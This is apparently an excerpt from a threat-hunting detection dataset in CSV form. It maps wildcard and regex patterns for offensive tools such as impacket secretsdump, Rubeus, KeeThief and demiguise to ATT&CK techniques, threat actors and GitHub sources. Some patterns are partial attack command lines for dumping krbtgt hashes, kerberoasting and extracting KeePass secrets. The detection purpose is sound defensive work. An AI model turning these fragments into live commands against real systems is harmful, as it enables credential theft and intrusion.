"* john_register_all*",".{0,1000}\sjohn_register_all.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","1818"
"* john_register_one*",".{0,1000}\sjohn_register_one.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","1819"
"* john_run*",".{0,1000}\sjohn_run.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","1820"
"* john_set_mpi*",".{0,1000}\sjohn_set_mpi.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","1821"
"* john_set_tristates*",".{0,1000}\sjohn_set_tristates.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","1822"
"* john_the_ripper_cracker.py*",".{0,1000}\sjohn_the_ripper_cracker\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","1823"
"* john_wait*",".{0,1000}\sjohn_wait.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","1824"
"* JohnTheRipper/*",".{0,1000}\sJohnTheRipper\/.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","1825"
"* JspShell ua*",".{0,1000}\sJspShell\sua.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","1828"
"* JuicyPotatoNG*",".{0,1000}\sJuicyPotatoNG.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","FoxKitten - APT33 - Volatile Cedar - Sandworm","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","N/A","N/A","10","9","844","101","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z","1829"
"* JumpSession.x64.o*",".{0,1000}\sJumpSession\.x64\.o.{0,1000}","offensive_tool_keyword","JumpSession_BOF","Beacon Object File allowing creation of Beacons in different sessions","T1055 - T1055.012 - T1548.002","TA0002 - TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/Octoberfest7/JumpSession_BOF","1","0","N/A","N/A","9","1","80","13","2022-05-23T22:23:33Z","2022-05-21T17:38:18Z","1830"
"* JumpSession.x86.o*",".{0,1000}\sJumpSession\.x86\.o.{0,1000}","offensive_tool_keyword","JumpSession_BOF","Beacon Object File allowing creation of Beacons in different sessions","T1055 - T1055.012 - T1548.002","TA0002 - TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/Octoberfest7/JumpSession_BOF","1","0","N/A","N/A","9","1","80","13","2022-05-23T22:23:33Z","2022-05-21T17:38:18Z","1831"
"* -just-dc-ntlm  *",".{0,1000}\s\-just\-dc\-ntlm\s\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","1832"
"* -just-dc-ntlm *",".{0,1000}\s\-just\-dc\-ntlm\s.{0,1000}","offensive_tool_keyword","secretsdump","secretdump.py from impacket - https://github.com/fortra/impacket","T1003.003","TA0006","Operation Wocao","Black Basta - Rhysida - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - ALLANITE","Credential Access","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","1833"
"* -just-dc-ntlm -just-dc-user krbtgt *",".{0,1000}\s\-just\-dc\-ntlm\s\-just\-dc\-user\skrbtgt\s.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213 - T1649","TA0006 - TA0008 - TA0009","N/A","Black Basta","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","N/A","N/A","10","7","618","76","2024-07-08T22:37:30Z","2022-04-29T09:08:32Z","1834"
"* -just-dc-user *",".{0,1000}\s\-just\-dc\-user\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","1835"
"* -just-dc-user *",".{0,1000}\s\-just\-dc\-user\s.{0,1000}","offensive_tool_keyword","secretsdump","secretdump.py from impacket - https://github.com/fortra/impacket","T1003.003","TA0006","Operation Wocao","Black Basta - Rhysida - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - ALLANITE","Credential Access","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","1836"
"* -just-dc-user 'krbtgt' -dc-ip  * -k -no-pass @*",".{0,1000}\s\-just\-dc\-user\s\'krbtgt\'\s\-dc\-ip\s\s.{0,1000}\s\-k\s\-no\-pass\s\@.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","1837"
"* -k * -c *.exe* -p Outlook.Application -o *.hta*",".{0,1000}\s\-k\s.{0,1000}\s\-c\s.{0,1000}\.exe.{0,1000}\s\-p\sOutlook\.Application\s\-o\s.{0,1000}\.hta.{0,1000}","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","0","N/A","N/A","9","10","1389","257","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z","1838"
"* -k * -c *cmd.exe /c * -o *.hta -p ShellBrowserWindow*",".{0,1000}\s\-k\s.{0,1000}\s\-c\s.{0,1000}cmd\.exe\s\/c\s.{0,1000}\s\-o\s.{0,1000}\.hta\s\-p\sShellBrowserWindow.{0,1000}","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","0","N/A","N/A","9","10","1389","257","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z","1839"
"* -k --kerberoast*",".{0,1000}\s\-k\s\-\-kerberoast.{0,1000}","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/layer8secure/SilentHound","1","0","N/A","AD Enumeration","7","5","489","47","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z","1840"
"* -k -request-user * -dc-ip*",".{0,1000}\s\-k\s\-request\-user\s.{0,1000}\s\-dc\-ip.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","1841"
"* k8gege520 *",".{0,1000}\sk8gege520\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","1842"
"* kali-install.sh*",".{0,1000}\skali\-install\.sh.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","1843"
"* kalilinux/kali-rolling*",".{0,1000}\skalilinux\/kali\-rolling.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","#linux","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","1844"
"* KaynInject.h*",".{0,1000}\sKaynInject\.h.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","N/A","9","6","532","108","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z","1845"
"* KaynStrike.cna*",".{0,1000}\sKaynStrike\.cna.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","0","N/A","N/A","9","5","422","66","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z","1846"
"* kdbof.cpp*",".{0,1000}\skdbof\.cpp.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of pwn1sher's KillDefender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KillDefender_BOF","1","0","N/A","N/A","10","10","66","15","2022-06-28T15:54:15Z","2022-02-11T07:03:59Z","1847"
"* keepass /unprotect*",".{0,1000}\skeepass\s\/unprotect.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","1848"
"* keepass backdoor persistence*",".{0,1000}\skeepass\sbackdoor\spersistence.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","1849"
"* Keepass persistence backdoor *",".{0,1000}\sKeepass\spersistence\sbackdoor\s.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","1850"
"* KeePwn.py*",".{0,1000}\sKeePwn\.py.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","1851"
"* KeeTheft.exe*",".{0,1000}\sKeeTheft\.exe.{0,1000}","offensive_tool_keyword","KeeThiefSyscalls","Patch GhostPack/KeeThief for it to use DInvoke and syscalls","T1003.001 - T1558.002","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/Metro-Holografix/KeeThiefSyscalls","1","0","N/A","private github repo","10","1","N/A","N/A","N/A","N/A","1852"
"* KeeThief.ps1*",".{0,1000}\sKeeThief\.ps1.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","1853"
"* kekeo/modules/kull_m_memory.c*",".{0,1000}\skekeo\/modules\/kull_m_memory\.c.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","1854"
"* kerberoast *",".{0,1000}\skerberoast\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","1855"
"* kerberoast *",".{0,1000}\skerberoast\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","1856"
"* kerberoast /spn:*",".{0,1000}\skerberoast\s\/spn\:.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","1857"
"* Kerberoastable -action list*",".{0,1000}\sKerberoastable\s\-action\slist.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","1858"
"* Kerberoastable -action write -target *",".{0,1000}\sKerberoastable\s\-action\swrite\s\-target\s.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","1859"
"* Kerberoastables.txt*",".{0,1000}\sKerberoastables\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","1860"
"* --kerberoasting *",".{0,1000}\s\-\-kerberoasting\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","1861"
"* --kerberoasting*",".{0,1000}\s\-\-kerberoasting.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","1862"
"* kerberos asreproast *",".{0,1000}\skerberos\sasreproast\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1863"
"* kerberos brute * -d *",".{0,1000}\skerberos\sbrute\s.{0,1000}\s\-d\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1864"
"* kerberos brute *.txt*",".{0,1000}\skerberos\sbrute\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1865"
"* kerberos ccache del *.ccache*",".{0,1000}\skerberos\sccache\sdel\s.{0,1000}\.ccache.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1866"
"* kerberos ccache exportkirbi *",".{0,1000}\skerberos\sccache\sexportkirbi\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1867"
